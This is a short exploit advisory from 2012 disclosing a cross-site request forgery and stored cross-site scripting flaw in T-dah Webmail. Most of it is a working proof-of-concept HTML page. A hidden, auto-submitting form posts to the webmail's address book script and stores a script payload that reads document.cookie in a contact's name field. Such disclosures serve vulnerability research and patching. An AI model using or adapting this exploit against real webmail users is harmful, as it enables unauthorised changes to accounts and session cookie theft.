T-dah Webmail CSRF & Stored XSS Exploit

Summary

T-dah Webmail suffers fromn CSRF & Stored XSS vulnerability.

Credit:

The information has been provided by Yakir Wizman.


Details

Vulnerable Systems:
 * T-dah Webmail

<html>
<head>
<title>Tdah Webmail – CSRF & XSS Attack</title>
</head>
<body>
<form name=’csrf’ method=’post’ action=’http://mail.tdah.us/addressbook.php’>
<input type=’hidden’ name=’lid’ value=’English’ />
<input type=’hidden’ name=’tid’ value=’default’ />
<input type=’hidden’ name=’id’ value=” />
<input type=’hidden’ name=’opt’ value=’add’ />
<input type=’hidden’ name=’name’ value='<script>alert(document.cookie);</script>’ />
<input type=’hidden’ name=’email’ value=’test@test.com’ />
<input type=’hidden’ name=’cell’ value=” />
<input type=’hidden’ name=’phone’ value=” />
<input type=’hidden’ name=’street’ value=” />
<input type=’hidden’ name=’apt’ value=” />
<input type=’hidden’ name=’city’ value=” />
<input type=’hidden’ name=’state’ value=” />
<input type=’hidden’ name=’zip’ value=” />
<input type=’hidden’ name=’country’ value=” />
<input type=’hidden’ name=’work’ value=” />
<input type=’hidden’ name=’wemail’ value=” />
<input type=’hidden’ name=’wphone’ value=” />
<input type=’hidden’ name=’wfax’ value=” />
<input type=’hidden’ name=’wstreet’ value=” />
<input type=’hidden’ name=’wcity’ value=” />
<input type=’hidden’ name=’wstate’ value=” />
<input type=’hidden’ name=’wzip’ value=” />
<input type=’hidden’ name=’aemail’ value=” />
<input type=’hidden’ name=’bday’ value=” />
<input type=’hidden’ name=’anniv’ value=” />
<input type=’hidden’ name=’aim’ value=” />
<input type=’hidden’ name=’icq’ value=” />
<input type=’hidden’ name=’msn’ value=” />
<input type=’hidden’ name=’yahoo’ value=” />
<input type=’hidden’ name=’google’ value=” />
<input type=’hidden’ name=’website’ value=” />
<input type=’hidden’ name=’picturename’ value=” />
<input type=’hidden’ name=’picturepath’ value=” />
<input type=’hidden’ name=’textnotes’ value=” />
</form>
<script type=’text/javascript’>
document.csrf.submit();
</script>
</body>
</html>

Disclosure Timeline:
Published: 2012-08-20

Categories: Exploits